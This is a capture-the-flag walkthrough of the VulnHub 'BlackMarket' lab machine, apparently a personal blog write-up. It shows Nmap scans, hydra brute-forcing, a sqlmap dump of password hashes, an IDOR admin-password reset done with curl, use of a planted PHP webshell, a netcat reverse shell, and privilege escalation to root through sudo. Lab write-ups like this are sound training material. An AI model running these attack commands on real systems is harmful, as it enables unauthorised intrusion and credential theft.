Details
This machine is https://www.vulnhub.com/series/blackmarket,149/
Recon Phase
First I needed to find out what ip address the target was running on, so I fired up Nmap to work it out
root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00027s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.000096s latency).
MAC Address: 08:00:27:89:83:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.3
Host is up (0.00032s latency).
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds
Next I needed an idea of what was running on the server to find potential entries into the system, so I pointed Nmap at it again
root@kali:~# nmap -sV 192.168.56.3
Nmap scan report for 192.168.56.3
Host is up (0.00056s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Flag Hunting
So next it was time to start hunting for flags, the first thing I did was navigate to http://192.168.56.3 in browser
First thing I see is a login page, I decided to poke around the html source
So that's the first flag,
flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
Part of the flag looks like base64, so I went ahead and decoded it
Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU= : CIA - Operation Treadstone
So I went ahead and googled this, it seemed to be a reference to Jason Bourne, but I wasn't sure how that could help me yet so I decided it was time to point dirbuster over at this
Once It finished I inspected the results
For a while I dug through these files looking for anything useful, but nothing came to mind with it. So next up I decided to try a wordlist about Jason Bourne and Operation Treadstone. Using cewl I generated a wordlist to use
root@kali:~# cewl -d 0 -m 5 http://bourne.wikia.com/wiki/Operation_Treadstone -w bourne.txt
I attempted to use these as logins with rockyou.txt as the password list and plugged them into hydra, but failed to find any login creds
root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt 192.168.56.3 ssh
root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt 192.168.56.3 ftp
So after messing around for a while, I decided to make a list of the flag words in a wordlist and use it as the passwords
root@kali:~# hydra -L bourne.txt -P flagWords.txt 192.168.56.3 ssh
root@kali:~# hydra -L bourne.txt -P flagWords.txt 192.168.56.3 ftp
This led to me getting credentials for ftp of
nicky:CIA
So I used the to access the ftp server
root@kali:~# ftp 192.168.56.3
When it asked for username and password I used nicky:CIA and began to dig around
ftp> ls -la
500 Illegal PORT command.
It seems passive mode is off, so I sorted that out and started digging
ftp> pass
ftp> ls -la
dr-xr-xr-x 4 1002 1002 4096 Nov 06 2017 .
dr-xr-xr-x 4 1002 1002 4096 Nov 06 2017 ..
-rw-r--r-- 1 1002 1002 220 Nov 06 2017 .bash_logout
-rw-r--r-- 1 1002 1002 3637 Nov 06 2017 .bashrc
drwx------ 2 1002 1002 4096 Nov 06 2017 .cache
-rw-r--r-- 1 1002 1002 675 Nov 06 2017 .profile
dr-xr-xr-x 3 65534 65534 4096 Nov 06 2017 ftp
A folder called "ftp", I decided to look in and see what i could find
ftp> cd ftp
ftp> ls -la
dr-xr-xr-x 3 65534 65534 4096 Nov 06 2017 .
dr-xr-xr-x 4 1002 1002 4096 Nov 06 2017 ..
drwxr-xr-x 2 1002 1002 4096 Nov 09 2017 ImpFiles
Another directory, so next I went into that
ftp> cd ImpFiles
ftp> ls -la
drwxr-xr-x 2 1002 1002 4096 Nov 09 2017 .
dr-xr-xr-x 3 65534 65534 4096 Nov 06 2017 ..
-rw-r--r-- 1 0 0 216 Nov 12 2017 IMP.txt
As there was only a .txt file, I decided to download it and see what was in it
ftp> get IMP.txt
Now I had the file, I closed my ftp connection and wanted to see what was in it
root@kali:~# cat IMP.txt
flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!
Now I had flag 2, I decided to decode it
Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy : Congrats Proceed Further
No helpful hint in this one, the message in IMP.txt was my next clue, "You must find out and hack it!" made me consider a hidden url that dirbuster had failed to find before. So I put together a new wordlist of vehicle workshop related things
vehical_workshop
vehicalworkshop
vehical_workshop
workshop
workshopvehical
vehicle_workshop
vehicleworkshop
workshopvehicle
vworkshop
wvehical
wvehicle
Vehical_Workshop
VehicalWorkshop
Vehical_Workshop
Workshop
WorkshopVehical
Vehicle_Workshop
VehicleWorkshop
WorkshopVehicle
VWorkshop
WVehical
WVehicle
I then put these into dirbuster and waited for it to finish
A new directory found on /vworkshop, I navigated over to it in browser
I decided to try the nicky:CIA on the various login screens available, first on employee login
And then on customer
But neither of them worked, so I took a look around the pages available, and found the spare parts store, nothing obviously useful yet.
Next I attempt to use the employee registration form to create my own account
And surprisingly, it worked
So I then tried to login with those creds
After looking around for a while I wasn't able to find much, so I tried doing this again making a user account this time
So I take a look around here, and see that selling a vehicle has a file upload option, so I attempted to upload /usr/share/webshells/php/simple-backdoor.php
And when Submit it
But unfortunately I was then unable to trigger the shell to work. So I spent a while playing around as both the user account and the admin account until on the spare parts details container I noticed something interesting. The url contains a parameter of ?sparepartid=[number]. I decided to fire up sqlmap to see if this was exploitable
root@kali:~# sqlmap -u http://192.168.56.3/vworkshop/viewsparepartsstoremore.php?sparepartid=4
So it is exploitable, I now wanted to dump the whole database
root@kali:~# sqlmap -u http://192.168.56.3/vworkshop/viewsparepartsstoremore.php?sparepartid=4 --all
This took a while, so I went and made a cup of tea, I also said yes to most of the options I was presented during the execution. Eventually it was finished and I had various bits of information. First there was a table called "flag"
Database: BlackMarket
Table: flag
[1 entry]
+--------+------+--------------------------------+
| FlagId | name | Information |
+--------+------+--------------------------------+
| 3 | Flag | Find Jason Bourne Email access |
+--------+------+--------------------------------+
So I now had flag 3 and my next hint. For this, there were 2 seemingly relevant tables
Database: BlackMarket
Table: user
[5 entries]
+--------+--------+----------+---------------------------------------------+
| userid | access | username | password |
+--------+--------+----------+---------------------------------------------+
| 1 | 1 | admin | cf18233438b9e88937ea0176f1311885 |
| 2 | 2 | user | 0d8d5cd06832b29560745fe4e1b941cf |
| 4 | 3 | supplier | 99b0e8da24e29e4ccb5d7d76e677c2ac (supplier) |
| 5 | 2 | jbourne | 28267a2e06e312aee91324e2fe8ef1fd |
| 6 | 3 | bladen | cbb8d2a0335c793532f9ad516987a41c |
+--------+--------+----------+---------------------------------------------+
Database: BlackMarket
Table: customer
[2 entries]
+--------+-----------------------+---------------+-----------------+
| userid | contact | address | customer_name |
+--------+-----------------------+---------------+-----------------+
| 2 | [email protected] | Moscow Russia | Dimitri Volkof |
| 5 | [email protected] | Texas | Jason Bourne |
+--------+-----------------------+---------------+-----------------+
So, sqlmap was able to crack the login for supplier, it was supplier:supplier, I headed back to the original login page at http://192.168.56.3 and used those creds to login
There didn't seem to be much going on here that was useful, so i tried accessing the /admin url we found earlier
While looking around this section I came across a section called users, and I had options to edit them. I decided to try and change jbourne's password
The first thing i noted was, when I processed this request i was sent to /admin/edit_customer.php?id=5, we already know admin is user id 1, we may be able to change admins details the same way we changed jbourne's, but first I logged out and tried to login as jbourne
Well the contents have changed, but I don't seem to have any new avenues of attack. So I went back to the idea of changing admins password. To start this I first changed the password for jbourne again, but inspected the request
I decided to copy this as curl, but adjust it to change id 1 by changing the endpoint to /admin/edit_customer.php?id=1
kali@root:~# curl 'http://192.168.56.3/admin/edit_customer.php?id=1' -H 'Host: 192.168.56.3' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://192.168.56.3/admin/customer.php' -H 'Cookie: PHPSESSID=ma5rgn6ctacf5j5iib6ds79ql3' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data 'name=Jason+Bourne&address=Texas+&contact=jbourne%40cia.gov&username=jbourne&password=pass'
window.alert('Customer updated successfully!');
window.history.back();
</script>
It looked like it worked, so I logged out and tried to login with admin:pass, but it failed. I then tried to login with jbourne:pass again, and it turned out I had overwritten the username for admin as well as the password
And thats flag 4, flag4{bm90aGluZyBpcyBoZXJl}, as with the previous ones I cracked the hash
bm90aGluZyBpcyBoZXJl : nothing is here
One I clicked okay I was forwarded back to the site, but couldn't find anything new, and as a lot of the previous parts have been helped by the flag, I decided to focus upon "Jason Bourne Email access ?????". My first thought is that this could indicate the password is 5 characters long, and was getting ready to take my wordlists from earlier and filter them for only strings of length 5 But before I did this, I Headed over to /squirrelmail
Before trying to mess around with wordlists, I decided to just try using the literal ????? as the password and tried to login with jbourne:?????
An email from putin, I opened it up to take a look
Now I have the 5th flag Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}, which i straight away crack
RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ= : Everything is encrypted
Now I had to spend a while investigating potential methods of encryption that could have been used on the message, until I eventually came across the substitution cipher, which when applied with a key of the alphabet backwards (z...a) gave a result
Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to use PassPass.jpg in order to get access.
First I attempted to access http://192.168.56.3/vworkshop/kgbbackdoor/ but received a 403, which was a good sign as it indicated the directory did indeed exist, but I would have to dig for files. I started with http://192.168.56.3/vworkshop/kgbbackdoor/PassPass.jpg
It was indicated this file would be useful, so I downloaded the file to inspect it with various tools
kali@root:~# file PassPass.jpg
PassPass.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 900x506, frames 3
kali@root:~# binwalk PassPass.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
kali@root:~# strings PassPass.jpg
<snip>
Pass = 5215565757312090656
I trimmed the output here as it was rather long, but what I found was a potential password to use. Next up was finding the backdoor itself. I started to dig on urls, coming across multiple 404 errors
Until eventually I tried /backdoor.php, and was presenting with what looked like a 404, but was different from the previous 404 pages
The version numbers didn't match among other differences, so I inspected the html source
This is when I realised it was a fake error page, and that this was probably the backdoor I had been looking for. In the hidden password field I tried the pass I got from PassPass.jpg of 5215565757312090656 but this didn't work. I then thought back to the flag clue "Everything is encrypted", maybe this includes the password, first I tried converting it to Hex 4861696C4B474220, but that didn't work, so next I tried ASCII and got "HailKGB" which certainly seemed appropriate. When I tried it as the password, it became apparent I had now accessed the backdoor
The first thing I did was access flag.txt and got flag6{Um9vdCB0aW1l}, which I then cracked.
Um9vdCB0aW1l : Root time
Root Time
I head over to the exec tab where I find it is a webshell, first i just want to check it works
$ whoami
ww-data
Okay, so the shell works, now I am looking for a priv esc route. First thing to do is get a list of users
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:108::/var/run/dbus:/bin/false
postfix:x:104:112::/var/spool/postfix:/bin/false
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
dovecot:x:106:114:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:115:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:108:116::/var/lib/landscape:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
libvirt-qemu:x:110:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:111:117:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
dimitri:x:1000:1000:,,,:/home/dimitri:/bin/bash
jbourne:x:1001:1001::/var/www/html/jbourne:
nicky:x:1002:1002:,,,:/home/nicky:/bin/ftponly
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false
So there is a user called dimitri who has /bin/bash access, this looks like the best target for a user to get access to. So I get digging into it
$ cd /home
$ ls -la
drwxr-xr-x 5 root root 4096 Nov 16 2017 .
drwxr-xr-x 22 root root 4096 Nov 1 2017 ..
drwxrwxr-x 2 dimitri dimitri 4096 Nov 16 2017 .Mylife
drwxr-xr-x 4 dimitri dimitri 4096 Nov 16 2017 dimitri
dr-xr-xr-x 4 nicky nicky 4096 Nov 6 2017 nicky
The directory called .Mylife owned by dimitri instantly caught my attention as it looked out of place, so i investigated it further
$ cd .Mylife
$ ls -la
drwxrwxr-x 2 dimitri dimitri 4096 Nov 16 2017 .
drwxr-xr-x 5 root root 4096 Nov 16 2017 ..
-rw-rw-r-- 1 dimitri dimitri 369 Nov 16 2017 .Secret
Well a file called .Secret is alway interesting I instantly wanted to read it
$ cat .Secret
I have been working on this CIA BlackMarket Project but it seems like I am not doing anything
right for people. Selling drugs and guns is not my business so soon I will quit the job.
About my personal life I am a sharp shooter have two kids but my wife don't like me and I am broke. Food wise I eat everything but DimitryHateApple
I will add more about later!
The phrase "DimitryHateApple" instantly stood out, it was in camel case, which does not make sense in a normal file, this led me to believe it could be the password. Also dimitri was spelt as Dimitry which is different to the user account I saw earlier. So I decided to try it as his password
$ su dimitri
But that gave nothing, I considered there may be and error and it may not have been forwarded, so I try again this time forwarding stderr to stdout
$ su dimitri 2>&1
su: must be run from a terminal
At this point I was sick of using a web terminal. And on the network tab I saw an option to spawn a reverse shell. So I opened another terminal on my kali machine to recieve it
root@kali:~# nc -lp 31337
And back on the network tab of the backdoor I hit the back connect button
/bin/sh: 0: can't access tty; job control turned off
$
At this point it became apparent I didn't have a full shell, so I utilised a python trick to spawn a nicer one
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Dimitri:/$
Now I had a better shell I tried to su to dimitri again using DimitryHateApple as the password
www-data@Dimitri:/$ su dimitri
su: Authentication failure
When this failed, I then tried again but with the corrected spelling of Dimitri, so I used DimitriHateApple as the password
www-data@Dimitri:/$ su dimitri
dimitri@Dimitri:/$
Now I had access as dimitri, I checked what I could now do
dimitri@Dimitri:/$ sudo -l
Matching Defaults entries for dimitri on Dimitri:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dimitri may run the following commands on Dimitri:
(ALL : ALL) ALL
This is what I was hoping for as now all it takes is
dimitri@Dimitri:/$ sudo su
root@Dimitri:/#
With the machine rooted, all that was left to do was collect the final flag
root@Dimitri:/# cd /home
root@Dimitri:/# ls -la
drwx------ 2 root root 4096 Nov 12 2017 .
drwxr-xr-x 22 root root 4096 Nov 1 2017 ..
-rw------- 1 root root 286 Nov 16 2017 .bash_history
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 705 Nov 9 2017 THEEND.txt
root@Dimitri:/# cat THEEND.txt
And that is the machine completed!